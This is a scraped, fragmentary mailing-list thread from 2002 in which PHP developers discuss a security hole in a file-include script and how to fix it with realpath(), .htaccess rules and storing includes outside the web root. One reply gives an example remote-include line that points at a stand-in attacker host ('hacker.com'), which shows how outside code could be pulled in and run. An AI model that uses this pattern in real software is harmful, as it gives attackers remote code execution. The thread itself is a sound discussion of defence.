Use realpath() to check the path. I also suspect your script is
vulnarable to cross-site includes (include('http://hacker.com/script.inc');)
Rick Beckman wrote:
Okay, I was mistaken... There is a gaping security hole in my simple li'l
script... How do I modify it to only accept files from a
erm..would that alow hackers access? Say I have a database include file
would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)
I hope bloody not!!! if so how on earth do i get round that!
John
On Friday 04 Oct 2002 10:52 am, Marek
all my include files are *.inc, and I have a .htaccess file that makes
apache refuse to serve those files directly thru http.
Justin
on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
erm..would that alow hackers access? Say I have a database include file
would hackers be able
so as my files are all .php I would be okay from an external hacking attempt?
I don't have any worry about internal as I am on a dedicated server
John
On Friday 04 Oct 2002 11:02 am, Justin French wrote:
all my include files are *.inc, and I have a .htaccess file that makes
apache refuse to
That would not help you if you include files based on unchecked user input.
Justin French wrote:
all my include files are *.inc, and I have a .htaccess file that makes
apache refuse to serve those files directly thru http.
Justin
on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
]
To: PHP [EMAIL PROTECTED]
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh
erm..would that alow hackers access? Say I have a database include file
would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)
I hope bloody
, but NOT accessible via http.
HTH, Stas
- Original Message -
From: John Wards [EMAIL PROTECTED]
To: PHP [EMAIL PROTECTED]
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh
erm..would that alow hackers access? Say I have a database include file
would hackers be able to get
:[EMAIL PROTECTED]]
Sent: Friday, October 04, 2002 6:14 AM
To: Stas Maximov
Cc: PHP General
Subject: Re: [PHP] Umm... Uh-oh
ah never thought of that!
John
On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
The easiest and safest way to get around this problem is to place
all
your
8 matches
Mail list logo